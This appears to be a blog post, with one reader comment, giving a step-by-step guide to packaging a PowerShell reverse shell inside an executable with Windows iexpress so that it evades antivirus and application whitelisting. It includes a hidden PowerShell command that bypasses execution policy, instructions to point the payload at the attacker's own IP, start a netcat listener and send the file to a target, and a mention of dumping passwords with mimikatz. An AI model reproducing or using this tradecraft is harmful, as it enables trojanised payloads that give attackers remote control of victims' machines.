Powershell to exe using iexpress

Saw something on twitter today about using the old standby program, iexpress.exe, which is still available in Win10, you can package your powershell scripts inside an executable. You can use it to run malicious powershell scripts etc…
SO I was thinking of some fun things to do with it, getting reverse shells, dumping passwords with mimikatz, compiling .cs files etc to evade AV and whitelisting. It’s fairly simple to do ,here’s an example of a powershell reverse shell:

just press ctrl+r , type in iexpress and hit enter.

chose the first selection and hit next.

hit next again

right click and download this file and name it Reverse.ps1

in the top box paste this:
powershell -NoP -NonI -W Hidden -Exec Bypass "& '.\reverse.ps1' 4444"
and change the IP & port to your own ip

choose hidden

select both of these checkboxes, youll get an error about Win95 but dont worry about it

choose no restart, the next window name your file and then hit next and save your package. You should have an exe created wherever you set the output to be.
Start a netcat listener

Send the file to your target, once the file is executed you should see it connect back to your listener.

Ill be posting some more stuff later on this week when I have more time to play.

Bookmark the permalink.

One Response to Powershell to exe using iexpress

  1. Neville says:

    I have been looking for the option to run a powershell script from “Install Program” for years.

    powershell -NoP -NonI -W Hidden -Exec Bypass “& ‘.\reverse.ps1’

    Excellent article and thank you.

Leave a Reply

Your email address will not be published. Required fields are marked *